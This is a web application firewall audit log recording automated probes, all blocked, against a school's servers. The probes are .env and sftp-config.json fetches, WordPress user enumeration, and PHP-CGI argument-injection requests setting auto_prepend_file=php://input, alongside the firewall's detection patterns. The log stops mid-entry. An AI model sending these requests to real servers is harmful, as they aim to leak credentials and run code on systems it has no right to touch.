Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3563af29-Z-- --04cb712e-A-- [29/May/2025:17:22:18 +0700] aDg1Wn1Ye2lUDKzW1LvzKwAAABI 103.236.140.4 37286 103.236.140.4 8181 --04cb712e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 Accept-Charset: utf-8 --04cb712e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04cb712e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748514138984990 814 (- - -) Stopwatch2: 1748514138984990 814; combined=328, p1=291, p2=0, p3=0, p4=0, p5=37, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04cb712e-Z-- --ac499203-A-- [29/May/2025:17:34:56 +0700] aDg4UGMaQtTb69S13pgbcQAAAEQ 103.236.140.4 37408 103.236.140.4 8181 --ac499203-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.249.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.249.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ac499203-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac499203-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748514896163506 2869 (- - -) Stopwatch2: 1748514896163506 2869; combined=1319, p1=419, p2=869, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac499203-Z-- --4f455a3f-A-- [29/May/2025:17:41:47 +0700] aDg562MaQtTb69S13pgbdAAAAEM 103.236.140.4 37422 103.236.140.4 8181 --4f455a3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.102.237.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.102.237.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4f455a3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f455a3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748515307030217 2836 (- - -) Stopwatch2: 1748515307030217 2836; combined=1240, p1=427, p2=778, p3=0, p4=0, p5=35, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f455a3f-Z-- --ec83a902-A-- [29/May/2025:17:50:42 +0700] aDg8AsX5pbyFXv2T3iqAxgAAANU 103.236.140.4 37516 103.236.140.4 8181 --ec83a902-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.80.7.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.80.7.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec83a902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec83a902-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748515842771735 2968 (- - -) Stopwatch2: 1748515842771735 2968; combined=1328, p1=441, p2=856, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec83a902-Z-- --37e5763c-A-- [29/May/2025:17:54:40 +0700] aDg88MX5pbyFXv2T3iqAyAAAAM8 103.236.140.4 37522 103.236.140.4 8181 --37e5763c-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --37e5763c-C-- --37e5763c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37e5763c-E-- --37e5763c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748516080072897 3983 (- - -) Stopwatch2: 1748516080072897 3983; combined=2392, p1=503, p2=1848, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37e5763c-Z-- --b4cc1936-A-- [29/May/2025:18:17:59 +0700] aDhCZ2MaQtTb69S13pgbkwAAAE4 103.236.140.4 37664 103.236.140.4 8181 --b4cc1936-B-- GET /sftp-config.json HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 193.32.126.214 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 193.32.126.214 X-Forwarded-Proto: http Connection: close --b4cc1936-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4cc1936-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748517479054497 711 (- - -) Stopwatch2: 1748517479054497 711; combined=261, p1=220, p2=0, p3=0, p4=0, p5=41, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4cc1936-Z-- --51c4027c-A-- [29/May/2025:18:49:59 +0700] aDhJ52MaQtTb69S13pgbmgAAAFI 103.236.140.4 37864 103.236.140.4 8181 --51c4027c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.55.7.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.55.7.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --51c4027c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51c4027c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748519399293485 3177 (- - -) Stopwatch2: 1748519399293485 3177; combined=1432, p1=493, p2=906, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51c4027c-Z-- --e9af4f28-A-- [29/May/2025:20:08:03 +0700] aDhcM2MaQtTb69S13pgb1AAAAEk 103.236.140.4 38388 103.236.140.4 8181 --e9af4f28-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --e9af4f28-C-- --e9af4f28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9af4f28-E-- --e9af4f28-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748524083623404 7032 (- - -) Stopwatch2: 1748524083623404 7032; combined=5248, p1=504, p2=4701, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9af4f28-Z-- --0eb0ec1d-A-- [29/May/2025:20:18:09 +0700] aDhekX1Ye2lUDKzW1LvzmAAAAAI 103.236.140.4 38438 103.236.140.4 8181 --0eb0ec1d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.224.131.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.224.131.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0eb0ec1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0eb0ec1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748524689949171 3355 (- - -) Stopwatch2: 1748524689949171 3355; combined=1472, p1=500, p2=932, p3=0, p4=0, p5=40, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0eb0ec1d-Z-- --73a03d6f-A-- [29/May/2025:20:55:28 +0700] aDhnUGMaQtTb69S13pgcVgAAAEg 103.236.140.4 39798 103.236.140.4 8181 --73a03d6f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 163.53.83.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 163.53.83.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --73a03d6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73a03d6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748526928937807 2655 (- - -) Stopwatch2: 1748526928937807 2655; combined=1282, p1=429, p2=826, p3=0, p4=0, p5=27, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73a03d6f-Z-- --bf958f12-A-- [29/May/2025:21:18:37 +0700] aDhsvX1Ye2lUDKzW1Lv09gAAAAQ 103.236.140.4 40896 103.236.140.4 8181 --bf958f12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.178.241 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.178.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --bf958f12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf958f12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748528317564664 701 (- - -) Stopwatch2: 1748528317564664 701; combined=288, p1=250, p2=0, p3=0, p4=0, p5=38, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf958f12-Z-- --91824052-A-- [29/May/2025:21:27:22 +0700] aDhuyn1Ye2lUDKzW1Lv0_gAAAAA 103.236.140.4 41112 103.236.140.4 8181 --91824052-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.79.60.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.79.60.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --91824052-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --91824052-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748528842766734 2760 (- - -) Stopwatch2: 1748528842766734 2760; combined=1239, p1=424, p2=785, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91824052-Z-- --70504835-A-- [29/May/2025:22:33:47 +0700] aDh-W_4vV4CoZ0MKLMMD3AAAAJA 103.236.140.4 41424 103.236.140.4 8181 --70504835-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 143.255.243.182 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.255.243.182 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70504835-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70504835-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748532827603138 3428 (- - -) Stopwatch2: 1748532827603138 3428; combined=1497, p1=508, p2=956, p3=0, p4=0, p5=33, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70504835-Z-- --c4329112-A-- [29/May/2025:22:47:45 +0700] aDiBoX1Ye2lUDKzW1Lv1SAAAAAo 103.236.140.4 42408 103.236.140.4 8181 --c4329112-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.77.152.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.77.152.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c4329112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4329112-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748533665353009 2803 (- - -) Stopwatch2: 1748533665353009 2803; combined=1274, p1=464, p2=780, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4329112-Z-- --a1b2dd5f-A-- [30/May/2025:00:10:39 +0700] aDiVD31Ye2lUDKzW1Lv3vAAAABQ 103.236.140.4 48132 103.236.140.4 8181 --a1b2dd5f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 222.252.8.225 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 222.252.8.225 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a1b2dd5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1b2dd5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748538639677230 2869 (- - -) Stopwatch2: 1748538639677230 2869; combined=1401, p1=451, p2=919, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1b2dd5f-Z-- --994f7e62-A-- [30/May/2025:00:31:48 +0700] aDiaBP4vV4CoZ0MKLMMH7AAAAJE 103.236.140.4 53022 103.236.140.4 8181 --994f7e62-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 113.56.161.14 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 113.56.161.14 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --994f7e62-C-- --994f7e62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --994f7e62-E-- --994f7e62-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748539908781380 4634 (- - -) Stopwatch2: 1748539908781380 4634; combined=3295, p1=501, p2=2759, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --994f7e62-Z-- --53461543-A-- [30/May/2025:00:45:15 +0700] aDidK8X5pbyFXv2T3iqGggAAANY 103.236.140.4 57756 103.236.140.4 8181 --53461543-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.156.104.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.156.104.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --53461543-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53461543-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file 